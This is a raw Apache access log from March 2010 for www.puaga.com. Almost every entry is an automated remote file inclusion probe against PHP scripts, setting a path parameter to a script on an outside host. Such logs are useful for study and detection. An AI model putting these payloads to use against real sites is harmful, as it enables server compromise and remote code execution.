64.15.158.246 - - [05/Mar/2010:07:39:07 -0800] "GET /logs/access_100224.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:40:42 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:40:47 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:41:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:41:05 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:13 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:13 -0800] "GET /logs/access_100210.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:13 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:23 -0800] "GET /logs////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:23 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:24 -0800] "GET ///?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:43 -0800] "GET /logs/access_100210.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:43 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:43 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:41:58 -0800] "GET /logs/access_100202.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:42:03 -0800] "GET /logs/access_100202.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:42:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:43:03 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:43:03 -0800] "GET /logs////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:07:43:04 -0800] "GET ///?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:43:10 -0800] "GET /logs/access_100211.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:43:19 -0800] "GET /logs////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:43:39 -0800] "GET /logs/access_100211.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:43:41 -0800] "GET ///?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.7.222.43 - - [05/Mar/2010:07:44:17 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
66.7.222.43 - - [05/Mar/2010:07:44:18 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.equitropic.com//portal/includes/js/ts????? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:44:27 -0800] "GET /logs/access_100217.log////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:44:27 -0800] "GET ///////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:44:27 -0800] "GET /logs////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:07:44:34 -0800] "GET /logs/access_100209.log////////?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:07:45:48 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:07:45:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:07:46:20 -0800] "GET /logs/access_100126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.243.182.174 - - [05/Mar/2010:07:46:23 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))" "puaga.com"
151.8.79.19 - - [05/Mar/2010:07:48:50 -0800] "GET /logs/access_100219.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:50:16 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:50:16 -0800] "GET /logs/access_100128.log%20%20///bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:50:16 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:07:50:27 -0800] "GET /bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:07:50:27 -0800] "GET /logs/access_100205.log//bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:07:50:27 -0800] "GET /logs//bbs////////memo.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [05/Mar/2010:07:52:58 -0800] "GET / HTTP/1.1" 200 468 "http://www.macdomain.org/forums.php?m=posts&q=30&n=last" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
66.235.124.17 - - [05/Mar/2010:07:52:59 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.pixero.net"
66.235.124.17 - - [05/Mar/2010:07:52:59 -0800] "GET / HTTP/1.1" 200 468 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.pixero.net"
200.93.147.154 - - [05/Mar/2010:07:53:19 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:53:32 -0800] "GET /logs/access_100210.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:53:37 -0800] "GET /logs/access_100130.log%20%20////?_PHPLIB[libdir]=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:53:47 -0800] "GET /logs/access_100202.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:54:10 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:54:39 -0800] "GET /logs/access_100219.log/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:54:39 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.17.201.144 - - [05/Mar/2010:07:54:39 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:01 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:06 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:08 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:54 -0800] "GET /logs/access_100210.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:55 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:56:58 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:57:06 -0800] "GET /logs//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:07:57:07 -0800] "GET /bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:57:26 -0800] "GET /logs/access_100214.log%20%20///bbs//write_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:58:56 -0800] "GET /logs/access_100210.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:07:59:02 -0800] "GET /logs/access_100202.log//bbs//write_comment_update.php?board_skin_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:07:59:40 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:01:29 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://samen-crew.co.cc/media/sc1? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:01:34 -0800] "GET /logs/access_100219.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:01:34 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:08:01:34 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:02:07 -0800] "GET /logs/access_100202.log%20%20//bbs////write_comment_update.php?board_skin_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [05/Mar/2010:08:02:39 -0800] "GET /logs/access_100215.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:04:27 -0800] "GET /logs/access_100206.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:04:54 -0800] "GET /logs/access_100221.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:05:30 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:05:31 -0800] "GET /logs/access_100206.log%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:06:04 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:06:10 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:06:12 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:06:41 -0800] "GET /logs/access_100217.log%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:07:36 -0800] "GET /logs/access_100217.log%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:08:13 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:08:13 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:08:13 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:08:08:36 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:09:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:09:21 -0800] "GET /logs/access_100220.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:09:22 -0800] "GET /logs/access_100220.log//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:09:23 -0800] "GET /appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:09:23 -0800] "GET /logs//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:08:09:28 -0800] "GET /blog HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:08:09:29 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/blog" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:08:09:29 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/blog" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:09:49 -0800] "GET /logs/access_100206.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:09:59 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:09:59 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:10:10 -0800] "GET /appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:10:10 -0800] "GET /logs/access_100220.log//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [05/Mar/2010:08:10:10 -0800] "GET /logs//appserv/www/appserv/main.php?appserv_root=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:10:28 -0800] "GET /logs/access_100221.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:10:48 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:11:22 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:11:49 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:11:49 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:11:49 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:12:20 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:12:23 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:08:12:23 -0800] "GET /logs/access_100213.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:08:12:25 -0800] "GET /logs/access_100221.log///bbs///write_comment_update.php?=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:08:12:56 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:13:15 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:13:16 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:08:13:27 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:13:38 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:13:40 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:08:14:18 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:15:12 -0800] "GET /logs/access_100201.log/sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:15:12 -0800] "GET /logs/sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:08:15:12 -0800] "GET /sourcedir=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
